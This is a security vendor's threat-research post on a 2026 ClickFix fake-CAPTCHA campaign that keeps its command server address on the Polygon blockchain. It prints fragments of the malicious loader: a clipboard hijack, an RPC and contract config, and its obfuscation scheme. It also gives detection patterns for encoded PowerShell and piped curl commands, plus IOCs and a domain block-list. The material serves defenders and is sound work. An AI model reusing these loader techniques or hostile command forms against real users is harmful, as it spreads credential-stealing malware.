Skip to main content
PhishEye

ClickFix 2026: Fake CAPTCHA Hides C2 On-Chain

15 min read

ClickFix 2026 cover: a fake "verify you are human" CAPTCHA box wired to a Polygon blockchain block holding the command-and-control domain.
Contents

A fake "verify you're human" CAPTCHA is now one of the most common ways malware reaches a desktop in 2026. The trick, known as ClickFix, never exploits a browser bug. It convinces the visitor to copy a hidden command and run it themselves, so the operating system only ever sees a person typing into their own shell. This investigation dissects a live ClickFix campaign that adds a distinctly 2026 twist: its command-and-control (C2) address is stored on the Polygon blockchain, a technique called EtherHiding, which makes the infrastructure almost impossible to take down.

The entry point was an ordinary hacked WooCommerce store. Loaded in a normal browser the site looked clean, because the malicious loader is cloaked and only fires for the right visitor. Behind it sits a professional ClickFix-as-a-service kit with swappable lure templates (fake reCAPTCHA, fake Cloudflare check, fake Blue Screen) and a Polygon smart contract that hands out the current attack domain on demand. Here is the full chain, the decoded payload, the indicators to block, and how to respond if a command has already been pasted.

Editor's note. The compromised site is anonymized as "the victim store": it is a real, legitimate business whose WordPress site was hacked, and naming it before remediation would expose its customers to further harm. All attacker infrastructure is defanged (superboomer[.]world). Do not open the live URLs in a normal browser. The entire point of the attack is to get you to paste a command.

At a glance
Technique ClickFix / fake CAPTCHA, clipboard hijack, infostealer loader
Entry point Compromised WordPress + WooCommerce site (cloaked JS injection)
Targets Windows and macOS desktop users only (Linux, Android, iOS skipped)
Lures Fake reCAPTCHA, fake Cloudflare "verify you are human," fake BSOD, fake browser update
C2 technique EtherHiding: the current C2 domain is stored in a Polygon smart contract
Resilience Domain rotation with one on-chain transaction; no re-infection needed
Status Active in 2026; 97 unique C2 domains across 113 on-chain rotations (Mar–Jun 2026)

What is ClickFix, and why 2026 is its breakout year

ClickFix flips the malware-delivery model on its head. Instead of exploiting software, it exploits the user. A web page shows a familiar-looking obstacle (a CAPTCHA, a Cloudflare check, a "fix this error" prompt) and walks the visitor through three "human verification" steps:

  1. Press Windows + R (or open Terminal on macOS).
  2. Press Ctrl + V; the page has already copied a command to the clipboard.
  3. Press Enter.

Those keystrokes run an attacker-supplied command, typically a hidden PowerShell or mshta one-liner that downloads and executes an infostealer (Lumma, StealC, or AMOS on macOS) or a loader. Because the victim runs the command, it sidesteps most browser and download protections: there is no malicious file to score and no signed bundle for Gatekeeper to quarantine. Through 2025 and into 2026, ClickFix became one of the most prevalent initial-access methods on the web, and the kits professionalized into ClickFix-as-a-service panels. The campaign below is one of them.

This is the same family as the macOS case we documented in ClickFix Drops Atomic Stealer via Fake DirBuster; what makes the 2026 variant different is everything behind the lure.

The case study: a hacked WooCommerce store

The victim store runs a standard stack: WordPress, WooCommerce, Astra/Elementor, on Hostinger/LiteSpeed. Loading the homepage as a normal desktop browser revealed nothing malicious. That is by design. The injected loader is cloaked: it builds its destination URL at runtime with String.fromCharCode() and injects a <script> element through document.createElement("script") only for targeted visitors, evading casual "view source" inspection and many automated scanners.

That selective behaviour is the hallmark of a Traffic Distribution System (TDS): server- and client-side logic that decides who sees the attack and who sees a clean page.

Anatomy of the attack chain

Compromised WordPress site
        │  (cloaked JS loader, built via fromCharCode)
        ▼
Reads C2 domain from Polygon smart contract  ◄── EtherHiding (the twist)
        │
        ▼
superboomer[.]world  (TDS — "Landing Analytics" panel)
        │  • log.php  → 1×1 tracking pixel (pageview telemetry, per victim site)
        │  • /api/?a=tds_cfg → targeting config
        ▼
OS check: Windows ✔  Mac ✔  Linux ✗  Android ✗  iOS ✗
        │
        ▼
Fake CAPTCHA landing page (titled "Terms of Service")
        │  • Hijacks navigator.clipboard.writeText
        │  • Decodes payload (base64 + XOR 0x83) → new Function()
        ▼
Clipboard poisoned with malicious command
        │  "Verify you're human: Win+R → Ctrl+V → Enter"
        ▼
Victim runs PowerShell / Terminal command → infostealer / loader

Stage 1: telemetry and targeting

The loader first beacons a tracking pixel and pulls a config:

  • hxxps://superboomer[.]world/log[.]php?t=pageview&src=<victim-site>&dv=desktop returns a 1×1 GIF, a classic analytics pixel that counts infections per compromised site.
  • hxxps://superboomer[.]world/api/?a=tds_cfg returns the targeting rules:
{ "enabled": true, "set_cookies": true,
  "show_windows": true, "show_mac": true,
  "show_linux": false, "show_android": false, "show_ios": false,
  "windows_landing": "/landing/windows.html",
  "mac_landing": "/landing/mac.html" }

Only Windows and macOS desktops are served the attack, because ClickFix "fixes" are OS-specific (PowerShell versus Terminal). Mobile and Linux visitors get nothing, which also reduces noise and sandbox detections.

Stage 2: the fake CAPTCHA and clipboard hijack

The landing page is disguised with the innocuous title "Terms of Service." Its core is a clipboard-poisoning routine:

// navigator.clipboard.writeText is overridden; copy events are intercepted
document.addEventListener('copy', function (e) {
  var s = window._lastClipData || '';
  try { var d = JSON.parse(s); if (d && d.token) s = d.token; } catch (e) {}
  // ... the malicious command is forced into the clipboard
});

The actual command is hidden in a base64 + single-byte XOR (key 0x83) blob and executed with new Function(). Decoding it reveals a full ClickFix-as-a-service kit ("BW" kit) with interchangeable lure templates:

Mode File Lure shown to victim
recaptcha v3.js Fake Google reCAPTCHA
cloudflare v6.js Fake Cloudflare "Verify you are human"
cf_update v7.js Fake Cloudflare browser update
bsod v4.js Fake Windows Blue Screen of Death
font / browser v2.js / v1.js Fake missing-font / browser update
mac_* v8.js / v9.js macOS reCAPTCHA / Cloudflare variants

Stage 3: EtherHiding, a command server you cannot delete

Here is what makes this campaign 2026-grade. Embedded in the decoded loader:

const CONTRACT_CONFIG = {
  RPC_HOSTS: [ "https://polygon.drpc.org",
               "https://polygon-bor-rpc.publicnode.com",
               "https://polygon.lava.build",
               "https://polygon.gateway.tenderly.co",
               "https://rpc.ankr.com/polygon" ],          // failover via Promise.any
  CONTRACT_ADDRESS: '0x08207B087F61d7e95E441E15fd6d40BEfd6eD308',
  FUNCTION_SELECTOR: '38bcdc1c'
};

The loader calls a smart contract on the Polygon blockchain to fetch its current C2 domain. We performed a read-only eth_call to that contract, and it returns the string:

superboomer[.]world

This is EtherHiding: storing attacker configuration in an immutable, censorship-resistant smart contract. The contract was deployed in March 2026, and we reconstructed its full history from the public ledger: 113 decoded Set URL updates rotating across 97 unique C2 domains (2026-03-11 to 2026-06-23), every one signed by the same operator wallet. The complete list is in the appendix below. In other words:

  • The domains are disposable. This one was registered the day before the attack.
  • The contract is permanent and acts as a rotating pointer.
  • Knock down superboomer[.]world, and the operator sends one transaction to point the contract at a new domain. Every compromised website worldwide updates instantly, with zero re-infection.

Why ClickFix plus EtherHiding is so hard to take down

Traditional takedown is whack-a-mole against this architecture:

  • Suspending the domain raises the attacker's cost but is defeated by an on-chain Set URL.
  • The smart contract cannot be removed. It lives on a public blockchain.
  • The infection (the injected loader) persists on each hacked site until the owner cleans it.

The durable chokepoints are therefore: (1) cleaning the compromised websites, (2) flagging the blockchain contract and operator wallet with RPC providers and chain-abuse trackers, and (3) user awareness, because the final step always requires a human to paste a command. For the operational side of (1) and (2), see our walkthrough on how to take down a phishing website.

Indicators of compromise (IOCs)

Defanged for safety. The blockchain identifiers are rotation-proof, so prioritize those for detection.

Network / web

  • superboomer[.]world — TDS / C2 (Cloudflare-fronted; registrar Global Domain Group LLC; registered 2026-06-23)
  • hxxps://superboomer[.]world/log[.]php — pageview telemetry pixel
  • hxxps://superboomer[.]world/api/?a=tds_cfg — TDS config
  • hxxps://superboomer[.]world/api/index[.]php?q=… — encrypted payload (enc:q2)
  • hxxps://superboomer[.]world/landing/{windows,mac,linux}[.]html — fake-CAPTCHA pages
  • /admin/"Landing Analytics" operator panel (PHP)

Blockchain (durable)

  • C2 contract: 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308 (Polygon) · getter selector 0x38bcdc1c
  • Operator wallet: 0x34c15320d6e8f59f1b66f6c191aaa7f87b894b66
  • Rotated C2 domains: 97 unique over 113 on-chain updates (see the full list in the appendix)

Host / client artifacts

  • Loader markers: window.__BW_SCRIPT_INITIALIZED__, localStorage site_repair_state, bw-downloaded
  • Mode files: v1.js through v9.js
  • Obfuscation: base64 + XOR 0x83, executed via new Function(); URLs built with String.fromCharCode()

How to detect ClickFix (for defenders)

  • Clipboard-to-Run correlation: alert on explorer.exe spawning powershell.exe, mshta.exe, or wscript.exe shortly after browser clipboard activity. The Win+R RunMRU history is a goldmine.
  • EDR command-line hunting: hidden or encoded PowerShell (-w hidden, -enc, FromBase64String, IEX / Invoke-Expression), mshta http…, or curl … | bash on macOS.
  • Network: outbound calls to public Polygon RPCs from a browser process on a non-crypto endpoint are anomalous, and a strong EtherHiding signal.
  • Web / DRP monitoring: scan your own and customer sites for cloaked fromCharCode and createElement("script") injections and the markers above.

How to clean a hacked WordPress site

  1. Search wp-content/themes (header.php, footer.php, functions.php), mu-plugins, and the database (wp_posts, wp_options, wp_postmeta) for fromCharCode, createElement, atob, or base64 blobs that build a <script src>.
  2. Hunt for rogue admin users, recently modified PHP files, and malicious .htaccess rules, since the cloaking is often PHP-side.
  3. Rotate all credentials (WordPress, hosting, database, FTP), update core and plugins, and restore from a known-clean backup if possible.
  4. Scan with Wordfence, Sucuri, or Imunify and notify your host.

How to protect your users

  • Train the one reflex that defeats ClickFix: no legitimate website ever asks you to press Win+R or paste a command to "verify you're human." That instruction is the attack.
  • Consider blocking or monitoring Win+R and clipboard-to-shell behaviour through policy or EDR on managed endpoints.
  • Monitor your brand and your customers' domains for compromise so injections are caught before victims are.

Frequently asked questions

What is ClickFix? A social-engineering attack in which a fake CAPTCHA or error message tricks you into copying a hidden command and running it yourself (via Windows Run or a Mac Terminal), installing malware without any software exploit.

Is a fake CAPTCHA dangerous? Yes. A real CAPTCHA never asks you to open Run or Terminal or to paste anything. If a "verification" page gives keyboard instructions, close the tab immediately.

What is EtherHiding? A technique where attackers store malware configuration or C2 details inside a blockchain smart contract. Because the blockchain cannot be edited or removed by defenders, it gives the campaign takedown-resistant, instantly-rotatable infrastructure.

How do I know if I ran a ClickFix command? Check Windows Run history (RunMRU), PowerShell logs, and your downloads for unexpected scripts. If in doubt, disconnect, change passwords from a clean device, and run a reputable malware scan. Assume credentials and crypto wallets are compromised.

How do I remove ClickFix malware from my website? Find and delete the injected loader (see the WordPress cleanup steps above), rotate all credentials, update everything, and restore from a clean backup. The blockchain C2 cannot be removed, but cleaning your site stops it from serving the attack.

Conclusion

ClickFix in 2026 is no longer a crude prompt. It is a professional, OS-aware, blockchain-anchored delivery platform that turns ordinary visitors into the exploit and ordinary websites into the distribution network. Defeating it takes more than domain takedowns: clean the compromised sites, track the on-chain operator, and above all teach the reflex that real human verification never asks you to run a command.

Protect your brand and your customers from ClickFix and fake-CAPTCHA injections. PhishEye continuously monitors your domains for malicious injections, fake-CAPTCHA TDS infrastructure, and lookalike phishing, and automates takedowns across registrars, hosts, and browser blocklists.

Appendix: C2 domain rotation history

This is the full command-and-control rotation history for the campaign, reconstructed entirely from public Polygon blockchain data: the Set URL transactions of the EtherHiding C2 contract. No attacker systems were accessed. Because the contract and the operator wallet are immutable on-chain anchors, this feed is rotation-proof: the domains change, but the two addresses below do not.

  • EtherHiding C2 contract: 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308 (Polygon) · getter selector 0x38bcdc1c
  • Operator wallet (signs every rotation): 0x34c15320d6e8f59f1b66f6c191aaa7f87b894b66
  • Decoded Set URL updates: 113 · unique C2 domains: 97
  • Observed window: 2026-03-11 to 2026-06-23 · cadence: a new domain every 1 to 2 days, on cheap and abused TLDs

The first rotation pointed at https://cloudflare-check[.]cfd (2026-03-11); the latest at the time of writing is superboomer[.]world (2026-06-23), with a burst of same-day rotations on 2026-05-28. Every unique domain across that window is listed below. Block or retro-hunt all of them.

Unique C2 domains (defanged)

C2 domain (defanged) First seen Last seen # sets
abrikos[.]xyz 2026-05-07 2026-05-08 2
allplanetssame[.]cfd 2026-03-30 2026-03-30 1
amalgama[.]lat 2026-05-29 2026-05-29 1
anakondabob[.]club 2026-05-08 2026-05-08 1
antongandon[.]club 2026-04-09 2026-04-09 1
ap7[.]supportly[.]au 2026-04-11 2026-04-11 1
arigatodomen[.]sbs 2026-06-05 2026-06-05 1
babybon[.]cfd 2026-05-13 2026-05-13 1
barmaleieba[.]lol 2026-06-23 2026-06-23 1
bearman[.]bond 2026-05-30 2026-05-30 1
bigboysclub[.]cyou 2026-03-30 2026-03-30 1
biggestchlen[.]lol 2026-04-03 2026-04-03 1
biggestchlen[.]xyz 2026-04-04 2026-04-04 1
biletors[.]cfd 2026-05-21 2026-05-21 1
birdybird[.]rest 2026-06-17 2026-06-17 1
blatnoitovar[.]xyz 2026-04-07 2026-04-07 1
bobik[.]cfd 2026-05-05 2026-05-05 1
bulletpop[.]cyou 2026-05-16 2026-05-16 2
chinabowl[.]club 2026-06-08 2026-06-08 1
chinarice[.]asia 2026-06-17 2026-06-17 1
chubrik[.]sbs 2026-05-08 2026-05-08 1
comicstar[.]lat 2026-05-25 2026-05-25 1
corppop[.]shop 2026-05-08 2026-05-08 1
cosmostars[.]shop 2026-06-03 2026-06-03 1
denegnet[.]click 2026-04-06 2026-04-06 1
diddyparty[.]click 2026-03-31 2026-03-31 1
etomoe[.]cfd 2026-04-27 2026-04-27 1
etomoidomen[.]cfd 2026-04-23 2026-04-23 1
ganiballektor[.]cfd 2026-05-28 2026-05-28 2
gdedengikarlos[.]cfd 2026-05-13 2026-05-13 1
gdelogi[.]lol 2026-04-06 2026-04-06 1
goodgoodmoon[.]bond 2026-04-02 2026-04-02 1
govnol[.]lat 2026-05-10 2026-05-10 1
gppcdnns[.]beer 2026-05-28 2026-05-28 1
holopebamiy[.]bond 2026-06-18 2026-06-18 1
honeymoonshop[.]asia 2026-06-13 2026-06-13 1
https://cloudflare-check[.]cfd 2026-03-11 2026-03-11 1
https://microblogver[.]bond 2026-03-23 2026-03-23 1
https://microblogver[.]bond/land/ 2026-03-23 2026-03-23 1
https://microloh[.]bond 2026-03-23 2026-03-23 2
https://mygoodblog[.]bond 2026-03-23 2026-03-23 1
https://mygoodblog[.]cfd 2026-03-23 2026-03-23 1
https://myverifyblog[.]sbs/ 2026-03-13 2026-03-13 1
https://sitepromclop[.]click 2026-03-20 2026-03-21 2
https://sitepromclop[.]click/land/ 2026-03-20 2026-03-21 2
ivangay[.]bond 2026-04-27 2026-04-27 1
krempie[.]xyz 2026-04-05 2026-04-06 2
krolikrojer[.]lat 2026-05-25 2026-05-25 1
lenders[.]digital 2026-05-26 2026-05-26 1
lizablud[.]shop 2026-06-07 2026-06-08 2
mamamiadomio[.]cfd 2026-06-18 2026-06-18 1
mambet[.]lol 2026-05-01 2026-05-01 1
mampodik[.]asia 2026-06-13 2026-06-13 1
marinaradom[.]cfd 2026-05-17 2026-05-17 1
marmelad[.]lat 2026-05-07 2026-05-07 1
megamegalodon[.]click 2026-05-28 2026-05-28 3
merengagoi[.]bond 2026-04-01 2026-04-01 1
merindashop[.]cyou 2026-06-02 2026-06-02 1
merkantalolol[.]asia 2026-06-22 2026-06-22 1
mexicodreams[.]bond 2026-06-06 2026-06-07 2
microblob[.]bond 2026-03-25 2026-03-29 2
microchlen[.]lat 2026-05-04 2026-05-04 1
microloh[.]bond 2026-03-23 2026-03-23 1
milksos[.]cfd 2026-05-11 2026-05-11 1
misterslivker[.]asia 2026-06-11 2026-06-11 1
mnepohui[.]sbs 2026-05-06 2026-05-06 1
mob[.]lanjut[.]in 2026-06-01 2026-06-01 1
moll[.]lanjut[.]in 2026-05-31 2026-05-31 1
myblobtop[.]site 2026-04-17 2026-04-17 1
mylovedomen[.]asia 2026-06-10 2026-06-10 1
mymicroblog[.]lat 2026-04-03 2026-04-03 1
nenadopapa[.]cfd 2026-04-18 2026-04-18 1
nihaoclub[.]asia 2026-06-09 2026-06-09 1
peachbro[.]bond 2026-06-05 2026-06-05 1
pilotkadomen[.]club 2026-06-09 2026-06-09 1
pinokros[.]xyz 2026-06-04 2026-06-04 1
pohuimne[.]lol 2026-04-22 2026-04-22 1
ponikas[.]cyou 2026-05-12 2026-05-12 1
pringlesbob[.]cfd 2026-06-05 2026-06-05 1
productionmaza[.]bond 2026-03-29 2026-03-29 1
productionmaza[.]cfd 2026-03-25 2026-03-25 1
productionmaza[.]cyou 2026-03-25 2026-03-26 3
productionmaza[.]sbs 2026-03-24 2026-03-25 2
prokladka[.]lol 2026-04-23 2026-04-23 1
pusanik[.]shop 2026-05-27 2026-05-27 1
robodomain[.]sbs 2026-05-10 2026-05-10 1
sandman[.]bond 2026-04-29 2026-04-29 1
sandman[.]lat 2026-05-02 2026-05-02 1
slivkishow[.]asia 2026-06-12 2026-06-13 2
smackit[.]lat 2026-05-20 2026-05-20 1
smenapodik[.]bond 2026-06-15 2026-06-15 1
spartanec[.]lat 2026-05-17 2026-05-17 1
superboomer[.]world 2026-06-23 2026-06-23 1
superpooper[.]click 2026-05-08 2026-05-08 1
thisismine[.]asia 2026-06-11 2026-06-11 1
whynotebanarot[.]xyz 2026-05-07 2026-05-07 1
yoshicity[.]xyz 2026-05-04 2026-05-04 1

TLD footprint

.cfd (16) · .bond (15) · .lat (10) · .asia (9) · .xyz (7) · .lol (6) · .sbs (5) · .cyou (5) · .click (5) · .club (4) · .shop (4) · .in (2) · .world (1) · .rest (1) · .beer (1) · .digital (1) · .site (1) · .au (1) · .bond/land/ (1) · .click/land/ (1) · .sbs/ (1)

Block-list (plain text for SIEM / DNS sinkhole import)

abrikos.xyz
allplanetssame.cfd
amalgama.lat
anakondabob.club
antongandon.club
ap7.supportly.au
arigatodomen.sbs
babybon.cfd
barmaleieba.lol
bearman.bond
bigboysclub.cyou
biggestchlen.lol
biggestchlen.xyz
biletors.cfd
birdybird.rest
blatnoitovar.xyz
bobik.cfd
bulletpop.cyou
chinabowl.club
chinarice.asia
chubrik.sbs
comicstar.lat
corppop.shop
cosmostars.shop
denegnet.click
diddyparty.click
etomoe.cfd
etomoidomen.cfd
ganiballektor.cfd
gdedengikarlos.cfd
gdelogi.lol
goodgoodmoon.bond
govnol.lat
gppcdnns.beer
holopebamiy.bond
honeymoonshop.asia
https://cloudflare-check.cfd
https://microblogver.bond
https://microblogver.bond/land/
https://microloh.bond
https://mygoodblog.bond
https://mygoodblog.cfd
https://myverifyblog.sbs/
https://sitepromclop.click
https://sitepromclop.click/land/
ivangay.bond
krempie.xyz
krolikrojer.lat
lenders.digital
lizablud.shop
mamamiadomio.cfd
mambet.lol
mampodik.asia
marinaradom.cfd
marmelad.lat
megamegalodon.click
merengagoi.bond
merindashop.cyou
merkantalolol.asia
mexicodreams.bond
microblob.bond
microchlen.lat
microloh.bond
milksos.cfd
misterslivker.asia
mnepohui.sbs
mob.lanjut.in
moll.lanjut.in
myblobtop.site
mylovedomen.asia
mymicroblog.lat
nenadopapa.cfd
nihaoclub.asia
peachbro.bond
pilotkadomen.club
pinokros.xyz
pohuimne.lol
ponikas.cyou
pringlesbob.cfd
productionmaza.bond
productionmaza.cfd
productionmaza.cyou
productionmaza.sbs
prokladka.lol
pusanik.shop
robodomain.sbs
sandman.bond
sandman.lat
slivkishow.asia
smackit.lat
smenapodik.bond
spartanec.lat
superboomer.world
superpooper.click
thisismine.asia
whynotebanarot.xyz
yoshicity.xyz

Threat research by the PhishEye team. IOCs are defanged in prose; the block-list above is plain text for tooling. The contract and operator wallet are the durable anchors: domains rotate, these do not. The victim site is anonymized pending remediation.

← Back to blog